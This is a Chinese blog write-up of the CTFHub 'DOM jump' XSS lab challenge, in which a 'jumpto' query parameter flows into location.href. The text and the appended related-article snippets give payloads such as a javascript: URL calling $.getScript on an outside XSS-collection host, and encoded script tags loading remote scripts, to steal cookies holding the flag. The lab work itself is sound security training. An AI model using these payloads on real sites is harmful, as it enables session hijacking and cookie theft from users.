CTFHUB技能树之XSS——DOM跳转

于 2024-10-20 23:43:46 发布
阅读量1.6k 收藏 7
点赞数 22
CC 4.0 BY-SA版权
分类专栏: XSS跨站脚本攻击 文章标签: xss CTFHUB技能树 经验分享 XSS跨站脚本攻击 网络安全 web安全 CTF题目
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_73049307/article/details/143101340

开启靶场,打开链接:

右键查看页面源代码:

location.search获取查询字符串部分(例如:

?jumpto=http://challenge-1ccc67ea8612a9b6.sandbox.ctfhub.com:10800/),然后使用.split("=")将其拆分为参数名和参数值的数组

检查target[0].slice(1)是否等于"jumpto",这是因为target[0]包含"?“字符,使用.slice(1)去掉”?"。如果相等,就使用location.href将页面重定向到target[1],也就是参数值所指定的URL

location.href = "javascript:alert('xss')" 这样的代码赋值给 location.href 时,浏览器会将其解释为一种特殊的URL方案,即 “javascript:”。在这种情况下,浏览器会将后面的 JavaScript 代码作为URL的一部分进行解析,然后执行它

用hackbar进行操作:

javascript:alert(1)

?jumpto=javascript:$.getScript('//xs.pe/6b6')

但是上传后,页面发生变化,出现:

此时,复制地址栏中的URL,粘贴到URL输入框中提交:

按理说是在xss后台看到记录的,但是却没有记录下来

仔细想了想,不对啊,按理说是已经触发了的,就很奇怪

CTFHub技能树webXSS
wzhwzh123321的博客
02-26 2897
XSS系列的题目中,由于需要使用能够接受XSS数据的平台,并且由于使用的是CTFHub的模拟机器人点击我们的虚假URL,因此使用的XSS平台不能是自己本地搭建的,如果是本地的模拟点击的机器人将无法访问我们给的这个URL地址,也就无法接收到我们想要的数据了,因此想解决本系列的题目,可以通过在线XSS平台或者自己使用服务器搭建一个XSS平台。可以看到可控的位置在53-55行中的这个位置,先闭合前面的单引号和<script>,然后再用一个<script>输入XSS代码,构造语句如下';第三题: DOM反射。
5、ctfhub技能树_web_XSS
最新发布
YanLucyqi的博客
05-28 903
(2)存储型XSS,顾名思义是恶意参数被存储起来了,通常存储在后端服务器当中,所以存储型XSS在URL地址当中不会包含恶意参数。sRC%3D%2F%2Fxss.pt%2F4GDIfH%3E%3C%2FsCrIpT%3E,What’s your name输入,点击Send。sRC%3D%2F%2Fxss.pt%2F4GDIfH%3E%3C%2FsCrIpT%3E,点击Send。sRC%3D%2F%2Fxss.pt%2F4GDIfH%3E%3C%2FsCrIpT%3E,点击Send。
CTFHub XSS DOM 跳转
qq_48368964的博客
08-02 1179
当你将类似于 location.href = "javascript:alert('xss')" 这样的代码赋值给 location.href 时,浏览器会将其解释为一种特殊的URL方案,即 “javascript:”。在这种情况下,浏览器会将后面的 JavaScript 代码作为URL的一部分进行解析,然后执行它。发现可以 老步骤 去xssaq.com上 复制一个 src来 接受 flag。直接在网页url后面跟上代码测试反弹。
CTFHub XSS DOM跳转 WriteUp
柠檬i的博客
07-05 3860
跳转 XSS 的攻击方式涉及将恶意脚本嵌入到跳转链接或重定向 URL 中,以便在用户点击该链接或重定向时触发脚本的执行。攻击者可以利用跳转 XSS 攻击来进行会话劫持、盗取用户信息、篡改页面内容等恶意活动。 为了防止跳转 XSS 攻击,开发人员应该对用户输入的数据进行适当的验证、过滤和转义,以确保在将其嵌入到页面中之前进行正确的处理。此外,安全的编程实践和使用安全的开发框架也是防止跳转 XSS 的关键。
CTFHub技能树web——XSS——DOM反射
qq_48368964的博客
08-02 782
创建一个项目 把src粘过来 在第一个输入框中 再将返回回来的url 复制粘贴到第二个 输入框中。根据框里的内容 直接右键查看网页源代码 看到 了其闭合方式。然后去网页测试一下alert(1)反射。看到 确实存在 去xssaq.cn。
CTFHub——XSS
2302_79119987的博客
03-28 2178
"fangfa('可控点')"> 使用 ” 闭合:与上题解题思路一致,用插入语句后用xss平台找到flag,插入语句后发现无回显(模拟黑客发送xss到服务器),查找源码,发现插入成功。将xss代码输入测试栏,发现url地址有变化,将url地址复制到url地址栏,上传成功后在xss平台查看cookie。尝试注入,查看源码发现过滤空格,url地址不对,使用/**/过滤。
CTFHUBXSSDOM反射
weixin_68416970的博客
08-05 636
CTFHUB技能树XSS漏洞,DOM反射的过关教程!超详细!包看包会!
CTFHub靶场————XSS
qq_61579604的博客
10-17 421
写入代码查看是否出现弹窗,查看源码发现存在xss但需要闭合后才可以出现弹窗。放入脚本,使用$.getScript功能是异步加载并执行。查看脚本注意闭合(利用xss平台的脚本代码)检查是否存在弹窗,可以放在url地址栏上执行。去平台查看cookie获取flag。检测是否出现弹窗利用双写绕过过滤。查看cookie获取flag。查看cookie获取flag。查看cookie获取flag。查看cookie获取flag。查看cookie获取flag。写入代码查看是否出现弹窗。插入脚本后将网址输入。
ctfhub web技能树
gh0stf1re的博客
08-30 721
ctfhub web技能树 前言 其实很多题之前已经做过了,但是感觉自己没有吃透吧,只是以做题为目的。所以打算重新做一下,加深一下印象,另外,把知识点也整理一下。 Web前置技能 HTTP协议 请求方式 这时我们采用的http方法是get方法,提示我们采用CTFHUB方法 方法1:利用burp更改请求方式 方法2:使用curl(curl是http神器) curl的用法指南——阮一峰 windows下有一个自带curl的终端神器——cmder,完整版还带有git,非常推荐,具体使用及配置可以参考这几篇
CTFHUB技能树XSS——DOM反射
weixin_73049307的博客
10-19 823
(这里还是用TLXSS平台的配置代码)直接指明是DOM反射型的XSS漏洞。可以看到存在xss漏洞。
HTML使用DOM属性跳转页面
漏刻有时数据可视化大屏(PHP&ECHARTS智能化开源软件系统)
10-27 627
window.onload = function () { document.getElementById("mainFrame").src= "http://mall.qiaodu.net"; } <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" f
dom History 跳转页面
qq_45827064的博客
05-19 403
History 跳转页面 2020年5月19日 15:50 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content=".
ctfhubxss
小宇的web博客
05-22 1810
ctfhubxss 1.我接触使用过三个XSS平台 1.脚本非常丰富:http://www.1oad.com 2.简约:https://xsspt.com 3.非常好用,自带模块成功获取到了内网ip(上面两个都没有成功):https://xsshs.cn 所以我这个文章也是简单的说说如何使用XSS平台,以第三个平台为例说明; 解题流程 1.先在上面的what’s your name 输入JavaScript语句,发现出错只能使用xss平台在下面的对话框中进行xss漏洞注入。 这里先注册一下xss测试平
点击事件然后页面跳转到指定DOM元素的位置
weixin_30325793的博客
03-04 874
设置一个函数,执行函数滚动条自动拖动,页面跳转到指定DOM元素的位置。 实现方式很简单,首先引入animatescroll.js文件(要先引入JQuery),然后 $('#id').animatescroll(); 即可调到指定DOM元素在页面的位置。 为方便可以编写一个函数,传入DOM元素的ID function jumpTo(id){ $("#"+id).ani...
给于 dom 解析的跳转框架
Lighthouse
12-02 502
主要类 GoAction 节点的子节点 goto/type/containerActivity/name/kind StubClassRef 类映射 UIComDesc
DOM(Document Object Model)XSS
qq_69100706的博客
07-30 423
CTF(Capture The Flag)竞赛中,利用DOM(Document Object Model)进行跳转XSS(Cross-Site Scripting)攻击是一种技术,它利用客户端JavaScript代码中的漏洞来实现非预期的页面跳转。这种攻击通常发生在Web应用的DOM处理用户输入数据时,没有正确地清理或验证这些数据,从而导致恶意脚本的执行。
通过ref 操作dom , 点击按钮后跳转到页面指定图片位置
wbskb的博客
09-03 386
滚动图片到视图:通过ref 操作dom , 点击按钮后跳转到页面指定图片位置。imgNode.scrollIntoView() 是什么?
CTFhubxss漏洞
weixin_46954909的博客
05-15 1125
前期了解:上半部分是用户执行的操作,下半部分是模拟服务器的操作。
JavaScript DOM的使用,让页面跳动动起来
未见花闻的博客
05-29 1333
前面我们学习了JavaScript基本的语法知识,但是只会这个语法我们好像也做不了什么,本篇文章将介绍DOM API,由于DOM体系非常大,本文只介绍一些比较基础常用的DOM知识,做一个DOM的引路人,目的是为了支撑完成猜数字和表白墙案例,其余的知识需要自己去知识海洋去探索了。
ctfhub 技能树 hhtttp
01-06
### CTFHub 技能树介绍 CTFHub 是一个专注于网络安全竞赛(Capture The Flag, CTF)的学习平台,旨在帮助参与者提升在各种安全领域的能力。技能树是该平台上用于指导学习者逐步掌握不同类型的漏洞利用和技术的重要组成部分。 #### XSS 攻击中的 DOM 跳转技术 在处理特定的跨站脚本攻击XSS)场景时,DOM跳转会涉及到URL解析和重定向逻辑。例如,在给定的例子中,通过访问带有特殊查询字符串的链接`http://challenge-1ccc67ea8612a9b6.sandbox.ctfhub.com:10800/?jumpto=http://example.com/`[^1],JavaScript代码会读取并解析这个 URL 参数来执行相应的操作。具体来说,`.split("=")`方法被用来分割参数名称与对应的值。 #### 利用 DOM 反射型 XSS 进行攻击 另一个重要的概念是在 Web 应用程序中存在的反射型 XSS漏洞。这种类型的攻击通常发生在服务器端未正确过滤用户输入的情况下。当恶意脚本作为响应的一部分返回给浏览器时就会触发此类攻击。比如下面这段 HTML 注入的内容可以绕过某些简单的防护机制: ```html ';</script><script src=//xs.pe/6b6></script> ``` 此片段会在页面加载过程中被执行,并尝试从外部资源加载额外的 JavaScript 文件[^2]。 为了有效应对这些威胁,开发者应该始终遵循最佳实践原则,如对所有不可信的数据进行严格的验证和编码处理;同时也要不断更新自己的知识体系以跟上最新的攻防趋势。
评论 10
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值